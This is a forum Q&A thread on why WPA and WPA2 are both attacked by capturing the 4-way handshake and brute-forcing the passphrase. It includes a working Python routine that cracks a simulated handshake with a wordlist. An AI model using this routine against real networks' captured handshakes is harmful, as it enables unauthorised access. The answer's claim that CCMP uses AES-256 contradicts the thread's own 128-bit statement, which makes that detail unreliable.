
What’s the difference between the process of attacking WPA and the process of attacking WPA2?

I know that WPA2 is much more secure than WPA. However, it seems to be the case that both of them are attacked using the same mechanism: basically, capturing the handshake and then doing brute-force. Are both protocols equally vulnerable to brute-force?


2 Answers


WPA was just a quick update to the WEP protocol to solve some security problems until the final version of the 802.11i standard was delivered.

The message integrity check, per-packet key hashing, broadcast key rotation, sequence counter and key mixing function were updated from WEP in order to patch some of the current vulnerabilities. This is why, in some cases, WPA is considered to be a draft of the 802.11i standard.

The main difference between WPA and WPA2 is the encryption protocol used:

  • TKIP, used by WPA, still uses the RC4 cipher like WEP, so apart from the patched vulnerabilities it has some new ones, like MIC key recovery and an extended version of the chop-chop WEP attack.

  • WPA2 was the final implementation of 802.11i and it introduces a new encryption protocol, CCMP. This new protocol uses a stronger cipher, AES-256, which represents a huge improvement over RC4.

Aside from this main difference, both WPA and WPA2 use the same key exchange mechanism. The 4-way handshake is used to exchange encryption keys, which is why you can attack WPA/WPA2 in the same way, by capturing its handshake and brute-forcing the PMK/PTK:

(sequence diagram of the 4-way handshake; image not included)

The attacker tries various passphrases, computes PMK and PTK using those passphrases, and then verifies the MAC in order to check if the passphrase was correct.

  • For a moment I had to stop and think what "chiper" was :) – Martin Argerami Aug 22 '16 at 12:15
  • @MartinArgerami It's the woodchipper that you're supposed to feed the computer of a developer who thinks they know enough to roll their own crypto. – Nzall Aug 22 '16 at 13:32
  • So TKIP is not an encryption algorithm on its own? It's just some iteration of RC4? – Minaj Aug 22 '16 at 15:41
  • Do both WPA and WPA2 use the same size of encryption key? I am trying to assess if the required brute-force effort is the same in both cases. – Minaj Aug 22 '16 at 15:53
  • @Minaj TKIP is an encryption protocol that the IEEE 802.11i task group designed in order to correct the WEP vulnerabilities without requiring a hardware upgrade. This is why TKIP still uses the RC4 cipher, but some new features were also implemented in order to correct the WEP vulnerabilities. This was just a "fast" patch until the new version could be released (WPA2 with CCMP). – z4k4 Aug 22 '16 at 19:42
  • @Minaj WPA with TKIP and WPA2 with CCMP use a 128-bit key length. But that doesn't really matter when you try to brute-force the 4-way handshake, as this is only the initial negotiation and the ciphers aren't used at this point. The 4-way handshake's objective is to authenticate the STA with the AP by proving that both know the PMK. In order to accomplish this they exchange some nonces, and from there both calculate the PSK that would afterwards be used by each cipher in order to encrypt the traffic. – z4k4 Aug 22 '16 at 20:02
  • Oh, this means you are not brute-forcing the actual encryption key? The PSK is different from the encryption key? – Minaj Aug 22 '16 at 20:24
  • I know that in WEP the PSK and encryption key are the same. Is this not the case in WPA/WPA2? – Minaj Aug 22 '16 at 20:30
  • Oops, sorry, I just made a mistake in the last comment. With the PMK and the nonces/MACs exchanged during the 4-way handshake, the AP and STA compute the PTK, not the PSK. – z4k4 Aug 23 '16 at 07:14
  • When you try to brute-force the 4-way handshake, you parse from the captured handshake the AP and STA addresses, the AP and STA nonces, and the EAPOL payload and MIC. Then you try a candidate password from the brute-force dictionary as a PSK to compute a PMK. Next you compute the PTK with the PMK and the nonces and MACs parsed initially. After that you only need to compute the MIC and compare it with the one captured at the beginning to know if the candidate password is the right PSK; if not, iterate. – z4k4 Aug 23 '16 at 07:14
  • After the handshake, what inputs are used to compute the AES key for WPA2-AES? Also, after breaking the PSK, I assume one can decrypt packets and find the AES key, right? – Minaj Aug 23 '16 at 08:20
  • I was under the impression that WPA/WPA2 are not encryption protocols, they're just certifications given by some organization. The actual protocols are TKIP and CCMP. A WPA device can support either, but a WPA2 device must support CCMP. – BlueRaja - Danny Pflughoeft Aug 23 '16 at 09:16
  • @BlueRaja-DannyPflughoeft Correct me if I'm wrong, but I think no one said WPA/WPA2 are encryption protocols. WPA/WPA2 implement TKIP and CCMP as data confidentiality and integrity protocols, and also some ciphers such as RC4 and AES to provide encryption. – z4k4 Aug 23 '16 at 09:40
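The passphrase-recovery loop the answer and its comments describe, written out as an added example that is not part of the original post: each candidate goes through PBKDF2 to a PMK, through the 802.11i PRF-512 to a PTK, and the first 16 bytes of the PTK (the KCK) produce a Key MIC that is compared with the MIC captured in message 2 of the handshake. The SSID, MAC addresses, nonces, EAPOL frame and wordlist below are constructed sample data, not a real capture; the "capture" is simulated by playing the station's role with a known passphrase. The only point where WPA and WPA2 diverge in this loop is the MIC algorithm selected by the key descriptor version bits (1 = HMAC-MD5 for WPA/TKIP, 2 = HMAC-SHA1-128 for WPA2/CCMP), so the same code handles both.

```python
"""Offline WPA/WPA2-PSK 4-way-handshake check (added example, not from the original post).

All network identifiers, nonces, frames and the wordlist are constructed for
illustration; nothing here comes from a real capture.
"""
import hashlib
import hmac

MIC_OFFSET = 81   # EAPOL header (4 bytes) + Key Descriptor fields preceding the Key MIC (77 bytes)
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PSK -> PMK: PBKDF2-HMAC-SHA1, 4096 rounds, 256-bit output. Identical for WPA and WPA2."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces))."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 x 160 bits >= 512 bits
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """Key MIC over the EAPOL-Key frame with its MIC field zeroed. The descriptor version
    (low 3 bits of Key Information) selects the algorithm: 1 = HMAC-MD5 (WPA/TKIP),
    2 = HMAC-SHA1-128 (WPA2/CCMP)."""
    version = eapol[6] & 0x07
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol[MIC_OFFSET + MIC_LEN:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]
    raise ValueError(f"unsupported key descriptor version {version}")


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol, wordlist):
    """For each candidate: PSK -> PMK -> PTK -> KCK -> MIC; return the candidate whose MIC matches."""
    captured_mic = eapol[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        ptk = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], eapol), captured_mic):
            return candidate
    return None


def build_eapol_msg2(snonce: bytes, mic: bytes, key_info: int = 0x010A) -> bytes:
    """Minimal constructed EAPOL-Key message 2. key_info 0x010A = pairwise | MIC | version 2;
    0x0109 selects version 1. The RSN IE in the key data is covered by the MIC."""
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # RSN IE: CCMP, PSK
    body = (b"\x02"                            # descriptor type (RSN key)
            + key_info.to_bytes(2, "big")      # key information
            + (16).to_bytes(2, "big")          # key length
            + (1).to_bytes(8, "big")           # replay counter
            + snonce                           # key nonce (SNonce)
            + b"\x00" * 16                     # key IV
            + b"\x00" * 8                      # key RSC
            + b"\x00" * 8                      # key ID
            + mic                              # key MIC (zero when computing it)
            + len(rsn_ie).to_bytes(2, "big")   # key data length
            + rsn_ie)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v1, type 3 (Key)


def make_capture(passphrase, ssid, ap_mac, sta_mac, anonce, snonce, key_info=0x010A):
    """Simulate the station: derive the PTK it would derive and sign message 2 with the KCK."""
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    unsigned = build_eapol_msg2(snonce, b"\x00" * MIC_LEN, key_info)
    return build_eapol_msg2(snonce, eapol_mic(ptk[:16], unsigned), key_info)


# Constructed sample data (hypothetical network, not a real capture).
SSID = "TestNet"
AP_MAC = bytes.fromhex("001122aabbcc")
STA_MAC = bytes.fromhex("66778899ddee")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
WORDLIST = ["password", "12345678", "correct horse battery", "letmein!"]


def demo(key_info: int = 0x010A):
    """Capture a handshake signed with the real passphrase, then run the wordlist against it."""
    eapol = make_capture("correct horse battery", SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, key_info)
    return crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, eapol, WORDLIST)


if __name__ == "__main__":
    print("WPA2/CCMP (HMAC-SHA1-128):", demo(0x010A))
    print("WPA/TKIP  (HMAC-MD5):     ", demo(0x0109))
```

Both calls recover the passphrase. The cost of each candidate is dominated by the 4096-round PBKDF2, which is the same for WPA and WPA2; that is the practical answer to the question, and it is why aircrack-ng and hashcat handle both with one attack and why the defence is passphrase entropy rather than the choice of TKIP or CCMP.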

The authentication mechanism is the same, but the difference between WPA and WPA2 is the encryption protocol used.

WPA uses the TKIP protocol while WPA2 introduces support for the CCMP protocol.

And it's worth mentioning that timing attacks against TKIP have been successful. Check this.
